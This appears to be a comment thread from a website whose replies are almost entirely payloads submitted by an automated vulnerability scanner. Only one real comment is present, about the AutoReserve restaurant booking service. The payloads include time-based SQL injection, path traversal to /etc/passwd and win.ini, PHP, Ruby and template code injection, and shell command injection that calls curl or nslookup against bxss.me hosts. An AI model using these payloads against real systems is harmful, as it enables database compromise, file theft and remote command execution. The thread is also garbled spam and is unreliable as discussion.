-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
WXFC0K64'; waitfor delay '0:0:15' --
re: JJ
-5 OR 518=(SELECT 518 FROM PG_SLEEP(15))--
re: JJ
ZoWaSAA9
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+81-81-1=0+0+0+1
re: JJ
-1 OR 3+81-81-1=0+0+0+1
re: JJ
-5) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
-1)) OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
DiLxp81h' OR 757=(SELECT 757 FROM PG_SLEEP(15))--
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
9ZbxIKIQ') OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
87aUNrUe')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
FoQLWcBl'; waitfor delay '0:0:15' --
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@JSmRR
re: JJ
-5 OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: JJ
-5) OR 727=(SELECT 727 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 114=(SELECT 114 FROM PG_SLEEP(15))--
re: JJ
y4J2myeG' OR 934=(SELECT 934 FROM PG_SLEEP(15))--
re: JJ
4r24BZOY') OR 197=(SELECT 197 FROM PG_SLEEP(15))--
re: JJ
uZJO7hnE')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@oySq6
re: JJ
1oI5CvbnO
re: JJ
response.write(9645929*9158520)
re: JJ
'+response.write(9645929*9158520)+'
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
%0abcc:074625.67-13768.67.6f84a.19990.2@bxss.me
re: JJ
"+response.write(9645929*9158520)+"
re: JJ
to@example.com>%0d%0abcc:074625.67-13769.67.6f84a.19990.2@bxss.me
re: JJ
${9999612+9999044}
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
)
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
'.gethostbyname(lc('hitdw'.'vihexltiee1cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(74).chr(118).chr(68).'
re: JJ
!(()&&!|*|*|
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
".gethostbyname(lc("hitix"."npoatckpefa99.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(118).chr(70)."
re: JJ
^(#$!@#$)(()))******
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
echo obgxph$()\ zmfnhx\nz^xyu||a #' &echo obgxph$()\ zmfnhx\nz^xyu||a #|" &echo obgxph$()\ zmfnhx\nz^xyu||a #
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
&echo bgrsbq$()\ reapni\nz^xyu||a #' &echo bgrsbq$()\ reapni\nz^xyu||a #|" &echo bgrsbq$()\ reapni\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
|echo txtazf$()\ uitpun\nz^xyu||a #' |echo txtazf$()\ uitpun\nz^xyu||a #|" |echo txtazf$()\ uitpun\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
"+"A".concat(70-3).concat(22*4).concat(116).concat(86).concat(116).concat(78)+(require"socket"
Socket.gethostbyname("hitdy"+"sxjrgpipb4122.bxss.me.")[3].to_s)+"
re: JJ
(nslookup hitruzjwfjost835e8.bxss.me||perl -e "gethostbyname('hitruzjwfjost835e8.bxss.me')")
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(102).concat(90).concat(113).concat(82)+(require'socket'
Socket.gethostbyname('hitas'+'unvvfovz1f2cb.bxss.me.')[3].to_s)+'
re: JJ
$(nslookup hitsvquboiphlc2516.bxss.me||perl -e "gethostbyname('hitsvquboiphlc2516.bxss.me')")
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
&nslookup hityhsdwqbvgw768db.bxss.me&'\"`0&nslookup hityhsdwqbvgw768db.bxss.me&`'
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&'\"`0&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&`'
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
/etc/shells
re: JJ
|(nslookup hitlugugqolaqfae79.bxss.me||perl -e "gethostbyname('hitlugugqolaqfae79.bxss.me')")
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
c:/windows/win.ini
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
`(nslookup hituanfeoslzub509f.bxss.me||perl -e "gethostbyname('hituanfeoslzub509f.bxss.me')")`
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
bxss.me
re: JJ
'"
re: JJ
';print(md5(31337));$a='
re: JJ
;(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")|(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")&(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")
re: JJ
file:///etc/passwd
re: JJ
<!--
re: JJ
";print(md5(31337));$a="
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
${@print(md5(31337))}
re: JJ
/WEB-INF/web.xml
re: JJ
${@print(md5(31337))}\
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
'.print(md5(31337)).'
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+191-191-1=0+0+0+1 --
re: JJ
-1 OR 3+191-191-1=0+0+0+1 --
re: JJ
-1 OR 2+203-203-1=0+0+0+1
re: JJ
-1 OR 3+203-203-1=0+0+0+1
re: JJ
-1' OR 2+283-283-1=0+0+0+1 --
re: JJ
-1' OR 3+283-283-1=0+0+0+1 --
re: JJ
-1' OR 2+528-528-1=0+0+0+1 or 'bPQgTocz'='
re: JJ
-1' OR 3+528-528-1=0+0+0+1 or 'bPQgTocz'='
re: JJ
-1" OR 2+956-956-1=0+0+0+1 --
re: JJ
-1" OR 3+956-956-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
1YVlLFWK'; waitfor delay '0:0:15' --
re: JJ
-5 OR 86=(SELECT 86 FROM PG_SLEEP(15))--
re: JJ
-5) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
re: JJ
g2ZEU4DX' OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: JJ
MIJuQAiO') OR 451=(SELECT 451 FROM PG_SLEEP(15))--
re: JJ
j6qdBOWB')) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@jEKdE
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1BDXM95QV40
re: JJ
response.write(9210049*9212519)
re: JJ
'+response.write(9210049*9212519)+'
re: JJ
"+response.write(9210049*9212519)+"
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
${9999224+9999734}
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
redirtest.acx
re: JJ
file:///etc/passwd
re: JJ
ctime
sleep
p0
(I30
tp1
Rp2
.
re: JJ
../
re: JJ
)
re: JJ
!(()&&!|*|*|
re: JJ
'.gethostbyname(lc('hitjl'.'ekaitrwm39217.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(122).chr(71).'
re: JJ
^(#$!@#$)(()))******
re: JJ
".gethostbyname(lc("hitxb"."qsskmxxq75a22.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(113).chr(81)."
re: JJ
gethostbyname(lc('hitew'.'rszbqerybbc20.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(79).chr(102).chr(74)
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
'"
re: JJ
/etc/shells
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
<!--
re: JJ
"+"A".concat(70-3).concat(22*4).concat(114).concat(71).concat(98).concat(83)+(require"socket"
Socket.gethostbyname("hitkm"+"wrwkvhvf4f115.bxss.me.")[3].to_s)+"
re: JJ
../../../../../../../../../../../../../../etc/shells
re: JJ
';print(md5(31337));$a='
re: JJ
replies
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hittf'+'cwsocnpoa733a.bxss.me.')[3].to_s)+'
re: JJ
c:/windows/win.ini
re: JJ
replies
re: JJ
";print(md5(31337));$a="
re: JJ
'A'.concat(70-3).concat(22*4).concat(99).concat(89).concat(122).concat(82)+(require'socket'
Socket.gethostbyname('hithi'+'kdpjfyoqd5b2d.bxss.me.')[3].to_s)
re: JJ
bxss.me
re: JJ
replies/.
re: JJ
${@print(md5(31337))}
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
'"()&%<zzz><ScRiPt >4VMr(9998)</ScRiPt>
re: JJ
${@print(md5(31337))}\
re: JJ
echo asvtrf$()\ sfexca\nz^xyu||a #' &echo asvtrf$()\ sfexca\nz^xyu||a #|" &echo asvtrf$()\ sfexca\nz^xyu||a #
re: JJ
http://bxss.me/t/fit.txt?.jpg
re: JJ
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgjquhfyszpadc99.bxss.me")}}
re: JJ
'.print(md5(31337)).'
re: JJ
&echo fmjenj$()\ mczyqe\nz^xyu||a #' &echo fmjenj$()\ mczyqe\nz^xyu||a #|" &echo fmjenj$()\ mczyqe\nz^xyu||a #
re: JJ
'"()&%<zzz><ScRiPt >4VMr(9012)</ScRiPt>
re: JJ
|echo zjyrrf$()\ ksrpqv\nz^xyu||a #' |echo zjyrrf$()\ ksrpqv\nz^xyu||a #|" |echo zjyrrf$()\ ksrpqv\nz^xyu||a #
re: JJ
9520658
re: JJ
expr 9000840398 - 949437
re: JJ
'"()
re: JJ
(nslookup -q=cname hitwhaeadhxcn079f7.bxss.me||curl hitwhaeadhxcn079f7.bxss.me))
re: JJ
'&&sleep(27*1000)*nbpcni&&'
re: JJ
$(nslookup -q=cname hitqwccllhecp2a4f6.bxss.me||curl hitqwccllhecp2a4f6.bxss.me)
re: JJ
"&&sleep(27*1000)*kfrift&&"
re: JJ
&nslookup -q=cname hitgztqjhbawtc7604.bxss.me&'\"`0&nslookup -q=cname hitgztqjhbawtc7604.bxss.me&`'
re: JJ
'||sleep(27*1000)*hfpvtz||'
re: JJ
&(nslookup -q=cname hitmqnoaqedefc1f47.bxss.me||curl hitmqnoaqedefc1f47.bxss.me)&'\"`0&(nslookup -q=cname hitmqnoaqedefc1f47.bxss.me||curl hitmqnoaqedefc1f47.bxss.me)&`'
re: JJ
"||sleep(27*1000)*aikzno||"
re: JJ
|(nslookup -q=cname hitufcdqlughka6987.bxss.me||curl hitufcdqlughka6987.bxss.me)
re: JJ
`(nslookup -q=cname hitzzvlsdnmse8144d.bxss.me||curl hitzzvlsdnmse8144d.bxss.me)`
re: JJ
;(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)|(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)&(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)
re: JJ
|(nslookup${IFS}-q${IFS}cname${IFS}hitdcrowfslfc89a38.bxss.me||curl${IFS}hitdcrowfslfc89a38.bxss.me)
re: JJ
&(nslookup${IFS}-q${IFS}cname${IFS}hitebuealubor937c7.bxss.me||curl${IFS}hitebuealubor937c7.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitebuealubor937c7.bxss.me||curl${IFS}hitebuealubor937c7.bxss.me)&`'
re: JJ
8ZQKMead
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
-1 OR 5*5=25 --
re: JJ
-1 OR 5*5=26 --
re: JJ
-1 OR 5*5=25
re: JJ
-1 OR 5*5=26
re: JJ
*if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
-1 waitfor delay '0:0:15' --
re: JJ
VvbCZA48'; waitfor delay '0:0:15' --
re: JJ
-1 OR 148=(SELECT 148 FROM PG_SLEEP(15))--
re: JJ
-1) OR 878=(SELECT 878 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 626=(SELECT 626 FROM PG_SLEEP(15))--
re: JJ
Ts8RCq3T' OR 302=(SELECT 302 FROM PG_SLEEP(15))--
re: JJ
3oEHLyfK') OR 830=(SELECT 830 FROM PG_SLEEP(15))--
re: JJ
aU2XuLdO')) OR 443=(SELECT 443 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
'"
re: JJ
@@fB8Qr
re: JJ
(select 198766*667891)
re: JJ
(select 198766*667891 from DUAL)
I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.
re: mirugai
Fa1rpfNK
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+527-527-1=0+0+0+1
re: mirugai
-1 OR 3+527-527-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
DbGkXblK'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 481=(SELECT 481 FROM PG_SLEEP(15))--
re: mirugai
q0spgWkk
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+595-595-1=0+0+0+1
re: mirugai
-1 OR 3+595-595-1=0+0+0+1
re: mirugai
